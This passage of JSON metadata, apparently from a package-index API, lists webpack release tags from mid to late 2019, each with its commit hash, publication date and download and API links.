43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/